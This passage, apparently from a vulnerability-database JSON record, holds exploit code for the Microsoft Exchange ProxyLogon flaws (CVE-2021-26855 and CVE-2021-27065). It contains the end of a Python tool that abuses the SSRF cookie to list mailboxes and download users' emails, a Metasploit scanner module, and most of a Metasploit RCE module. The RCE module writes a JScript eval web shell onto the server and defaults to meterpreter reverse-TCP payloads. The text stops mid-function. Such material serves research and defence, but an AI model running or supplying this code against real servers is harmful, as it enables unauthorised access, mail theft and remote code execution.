else:\n print(\"[-] Can't get FQDN \")\n exit(0)\n\n\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla pwner\"}\n from xml.etree import ElementTree as ET\n dom = ET.fromstring(content_folderid)\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\n id_folder = p[0].attrib.get(\"Id\")\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, dowloading email\")\n break\n print(\"[+]Getting mails...\")\n dom_messages = ET.fromstring(rs.text)\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\n for m in messages:\n id_message = m[0].attrib.get(\"Id\")\n change_key_message = m[0].attrib.get(\"ChangeKey\")\n data = payload_get_mail.format(id_message, change_key_message)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, downloading email\")\n break\n\n try:\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\n f.write(rs.text)\n f.close()\n except Exception as e:\n print(\"[!] Can't write .xml file to path (email): \", e)\n\n\ndef checkURI(url, fqdn):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\n for uri in arr_uri:\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"[email\u00a0protected]\"),\n headers=headers)\n #print(rs.content)\n if rs.status_code == 200 and \"MessageText\" in rs.text:\n print(\"[+] Valid URI:\", uri)\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\n else:\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\n return uri, calculated_domain\n #time.sleep(1)\n print(\"[-] No valid URI found ;(\")\n exit(0)\n\n\ndef checkEmailBoxes(url, uri, user, fqdn, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\n headers=headers)\n #time.sleep(1)\n #print(rs.content)\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\n print(\"[+] Valid Email Found!: {}\".format(user))\n extractEmail(url, uri, user, fqdn, rs.text, path)\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\n print(\"[-] Not Valid Email: {}\".format(user))\n\n\ndef main():\n __URL__ = None\n __FQDN__ = None\n __mailbox_domain__ = None\n __path__ = None\n print(\"[***** OhhWAA *****]\")\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\n args = parser.parse_args()\n __URL__ = args.url\n __FQDN__ = args.fqdn\n __mailbox_domain__ = args.domain\n __list_users__ = args.list\n __valid_users__ = []\n __path__ = args.path\n if not __FQDN__:\n __FQDN__ = getFQDN(__URL__)\n print(\"[+] Got FQDN:\", __FQDN__)\n\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\n\n if not __mailbox_domain__:\n __mailbox_domain__ = calculated_domain\n\n list_users = open(__list_users__, \"r\")\n for user in list_users:\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\n\n print(\"[!!!] FINISHED OhhWAA\")\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:37:41", "description": "This module scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065). As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-07T13:37:20", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/exchange_proxylogon/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Scanner',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check.', 'POST', ['GET', 'POST']])\n ])\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def run_host(target_host)\n @proto = (ssl ? 'https' : 'http')\n\n uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n received = send_request_cgi({\n 'method' => datastore['METHOD'],\n 'uri' => uri,\n 'cookie' => 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'\n })\n unless received\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if received && (received.code != 500 && received.code != 503)\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error(\"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if received.headers['X-CalculatedBETarget'] != 'localhost'\n print_error(message('The target is not vulnerable to CVE-2021-26855.'))\n vprint_error('Could\\'t obtain a correct \\'X-CalculatedBETarget\\' in the response header.')\n\n return Exploit::CheckCode::Safe\n end\n\n print_good(message('The target is vulnerable to CVE-2021-26855.'))\n msg = \"Obtained HTTP response code #{received.code} for #{full_uri(uri)}.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/exchange_proxylogon.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-24T08:37:42", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T23:49:45", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-11-10T00:12:38", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll', # https://twitter.com/lotusdll/status/1371465073525362691\n 'Praetorian' # # Vulnerability analysis + PoC\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/praetorian-inc/proxylogon-exploit'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', Rex::UserAgent.session_agent])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n [server, legacy_dn]\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.split('.')[0].downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status(message('Retrieving backend FQDN over RPC request'))\n server_name = request_fqdn\n print_status(\"Internal server name (#{server_name})\")\n end\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Preparing the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Writing the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning('Waiting for the payload to be available')\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t access the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, auth_session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if 